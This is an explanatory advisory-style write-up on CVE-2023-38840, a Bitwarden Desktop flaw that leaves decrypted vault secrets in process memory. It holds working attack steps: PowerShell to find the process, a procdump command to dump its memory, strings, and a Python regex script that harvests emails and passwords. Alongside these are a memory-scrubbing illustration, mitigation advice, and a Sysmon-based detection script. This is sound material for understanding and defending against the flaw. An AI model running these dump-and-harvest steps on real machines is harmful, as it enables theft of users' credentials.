CVE-2023-38840 - How Bitwarden Desktop 2023.7. Leaks Secrets Through Local Process Memory
CVE-2023-38840 is a security vulnerability found in Bitwarden Desktop, versions 2023.7. and below. If an attacker can run code on the same machine as Bitwarden (has "local access"), they may be able to extract sensitive information (such as vault contents, passwords, etc.) from the memory of the Bitwarden desktop process (Bitwarden.exe).
It's not a remote attack — but for shared, public, or compromised PCs, it's something to worry about.
Why is this important?
Bitwarden is a popular open-source password manager. People trust it to keep their entire digital life safe. If private data from Bitwarden's process memory can be accessed by another local user or malware, that's a serious risk.
Unlike remote attacks, this bug requires local access. But in environments such as shared computers, or where malware is already present, it could lead to major data exposure.
How the exploit works
When you open your Bitwarden vault on the Desktop app, most of your secrets are decrypted and stored in memory while the app runs. Due to how Bitwarden Desktop 2023.7. (and earlier) is coded, this sensitive data remains in memory in plaintext and could be read directly from process memory.
On Windows, a user running with sufficient privileges can inspect and dump another process's RAM.
Key points
- Bitwarden Desktop does not scrub (wipe) secrets from RAM after use.
- No encryption is applied to in-memory data.
- Bitwarden.exe can be scanned by tools like Process Hacker, procdump, strings, or custom scripts.
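As an added illustration (not Bitwarden's code, and no claim about its internals), the following Python models the two behaviours the list contrasts: an unlock routine that writes decrypted vault data into working memory and leaves it there, versus one that zeroes the region with a real memset once the caller has what it needs. The "heap" is a simulated bytearray, VAULT_ITEM is constructed sample data, and scan_memory stands in for searching a process dump.

```python
import ctypes

# Constructed sample data: what one decrypted vault item might look like once unlocked.
VAULT_ITEM = b"https://mybank.example|JohnDoe|P@sswrdSuperSecret!"
HEAP_SIZE = 4096  # size of the simulated process heap


def memset_zero(heap: bytearray, offset: int, length: int) -> None:
    """Zero `length` bytes of the mutable buffer in place via a real memset call."""
    if length <= 0:
        return
    region = (ctypes.c_char * length).from_buffer(heap, offset)
    ctypes.memset(ctypes.addressof(region), 0, length)


def scan_memory(heap: bytearray, needle: bytes) -> int:
    """Stand-in for scanning a memory dump: offset of needle, or -1 if absent."""
    return heap.find(needle)


def extract_username(item: bytes) -> str:
    """Toy consumer of the decrypted item (the second '|'-separated field)."""
    return item.split(b"|")[1].decode()


def unlock_leaky(heap: bytearray, offset: int, item: bytes) -> str:
    """Decrypt into working memory and return, leaving the plaintext resident.

    This is the defect class the advisory describes: nothing wipes the region.
    """
    heap[offset:offset + len(item)] = item
    return extract_username(bytes(heap[offset:offset + len(item)]))


def unlock_scrubbed(heap: bytearray, offset: int, item: bytes) -> str:
    """Same work, but the plaintext region is zeroed as soon as it has been used."""
    n = len(item)
    heap[offset:offset + n] = item
    try:
        # In a real program this bytes() copy is itself an unscrubbable leak;
        # the simulation only tracks the working buffer.
        return extract_username(bytes(heap[offset:offset + n]))
    finally:
        memset_zero(heap, offset, n)


def demo():
    """Return (leaked_after_leaky, resident_after_scrubbed, username_from_scrubbed)."""
    secret = b"P@sswrdSuperSecret!"

    heap = bytearray(HEAP_SIZE)
    unlock_leaky(heap, 128, VAULT_ITEM)
    leaked = scan_memory(heap, secret) != -1

    heap = bytearray(HEAP_SIZE)
    user = unlock_scrubbed(heap, 128, VAULT_ITEM)
    still_resident = scan_memory(heap, secret) != -1

    return leaked, still_resident, user


if __name__ == "__main__":
    leaked, resident, user = demo()
    print(f"leaky unlock left secret in memory: {leaked}")
    print(f"scrubbed unlock left secret in memory: {resident} (still returned {user!r})")
```

Immutable Python objects (str, bytes) cannot be wiped this way, which is why the copy handed to extract_username is flagged in the comment; in languages with explicit memory control the same rule applies directly: decrypted material lives in a buffer that is zeroed before it is released, not in whatever allocation happened to receive it.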
1. Requirements
- Local access to the PC (either physical, via RDP, or via malware)
- Sysinternals procdump or a similar tool (https://docs.microsoft.com/en-us/sysinternals/downloads/procdump)
- Optional: the strings utility
2. Find the Bitwarden process
You can open Task Manager and find Bitwarden.exe, or use PowerShell:
Get-Process | Where-Object {$_.ProcessName -like "Bitwarden"}
3. Dump the process memory
Run in a terminal as administrator (replace <pid> with the actual process ID):
procdump -ma <pid> bitwarden_mem.dmp
4. Search for secrets
Now you can use strings or a hex editor to search the dump. Common search terms: website URLs, email addresses, parts of the master password, etc.
Example with strings:
strings bitwarden_mem.dmp > bw_strings.txt
You might see pieces like:
https://mybank.com
JohnDoe
P@sswrdSuperSecret!
2FA-backup-code-123456
Real-world attackers may automate searching with a Python script to look for patterns like URLs, emails, or regex for password-like strings.
Here's a Python snippet to search for possible email addresses and passwords in the dump:
import re

with open('bw_strings.txt', 'r', encoding='utf-8', errors='ignore') as f:
    data = f.read()

# Email-like tokens
emails = re.findall(r'[\w\.-]+@[\w\.-]+', data)
# Runs of 8+ password-like characters (very broad; expect many false positives)
passwords = re.findall(r'(?i)[A-Za-z0-9!@#$%^&*()_+=\-{}\[\]:;"\'?\/\\\.]{8,}', data)

print("Possible Emails:")
print(set(emails))
print("\nPossible Passwords:")
print(set(passwords))
Mitigation
- Upgrade Bitwarden Desktop to at least version 2023.8. or the latest release, where this bug has been addressed.
- Do not use Bitwarden Desktop on shared or untrusted computers.
- If you handled sensitive data via Bitwarden Desktop on compromised machines, consider rotating your passwords.
- End a Bitwarden session and close the application completely after use — this removes decrypted secrets from memory.
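A detection-side counterpart, added here as an example and not part of the original write-up: on hosts where Bitwarden Desktop runs, Sysmon Event ID 10 (ProcessAccess) records which process opened a handle to which target and with what access mask, so dump attempts like the one walked through above leave a trail that can be alerted on. The script below parses a few constructed, flattened Event 10 records (pipe-separated key=value pairs, not Sysmon's real XML layout) and flags any process outside an allowlist that obtained PROCESS_VM_READ on Bitwarden.exe; the BENIGN_READERS allowlist is an assumption to tune per environment.

```python
# Windows access right needed to read another process's memory (ReadProcessMemory).
PROCESS_VM_READ = 0x0010

# Processes expected to read other processes' memory on a healthy host. This is an
# assumption to tune per environment; WerFault writes crash dumps legitimately.
BENIGN_READERS = {
    r"c:\windows\system32\werfault.exe",
}

# Constructed sample records in a flattened key=value layout (not Sysmon's XML).
SAMPLE_EVENTS = [
    r"EventID=10 | SourceImage=C:\Windows\System32\csrss.exe | TargetImage=C:\Program Files\Bitwarden\Bitwarden.exe | GrantedAccess=0x1400",
    r"EventID=10 | SourceImage=C:\Tools\procdump64.exe | TargetImage=C:\Program Files\Bitwarden\Bitwarden.exe | GrantedAccess=0x1FFFFF",
    r"EventID=10 | SourceImage=C:\Windows\System32\WerFault.exe | TargetImage=C:\Program Files\Bitwarden\Bitwarden.exe | GrantedAccess=0x1FFFFF",
    r"EventID=10 | SourceImage=C:\Tools\procdump64.exe | TargetImage=C:\Windows\notepad.exe | GrantedAccess=0x1FFFFF",
    r"EventID=1 | Image=C:\Tools\procdump64.exe | CommandLine=procdump -ma 4242 bitwarden_mem.dmp",
]


def parse_event(line: str) -> dict:
    """Split 'k=v | k=v' into a dict; values may contain spaces but not '|'."""
    fields = {}
    for part in line.split("|"):
        key, sep, value = part.strip().partition("=")
        if sep:
            fields[key] = value
    return fields


def is_suspicious_access(event: dict, target_name: str = "bitwarden.exe") -> bool:
    """True when a non-allowlisted process obtained VM_READ on the target image."""
    if event.get("EventID") != "10":
        return False
    target = event.get("TargetImage", "").lower()
    if not target.endswith("\\" + target_name):
        return False
    # GrantedAccess is a hex mask; only the VM_READ bit matters for dumping memory.
    granted = int(event.get("GrantedAccess", "0x0"), 16)
    if not granted & PROCESS_VM_READ:
        return False
    source = event.get("SourceImage", "").lower()
    return source not in BENIGN_READERS


def find_suspicious_readers(lines) -> list:
    """Return the SourceImage of every record that trips the rule, in log order."""
    hits = []
    for line in lines:
        event = parse_event(line)
        if is_suspicious_access(event):
            hits.append(event["SourceImage"])
    return hits


if __name__ == "__main__":
    for src in find_suspicious_readers(SAMPLE_EVENTS):
        print("ALERT: memory read of Bitwarden.exe by", src)
```

procdump is a legitimate Sysinternals tool, so the signal is not the binary itself but a handle with the VM_READ bit opened against the password manager by something that is not a known crash handler; csrss.exe in the sample queries information only (0x1400) and is correctly ignored.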
Summary
CVE-2023-38840 in Bitwarden Desktop v2023.7. and earlier highlights the real risk of desktop app secrets being left in RAM — and how easy it can be for attackers with local access to exploit this. Always keep security software updated and control who has access to your machine.
Timeline
Published on: 08/15/2023 17:15:00 UTC
Last modified on: 08/22/2023 14:58:00 UTC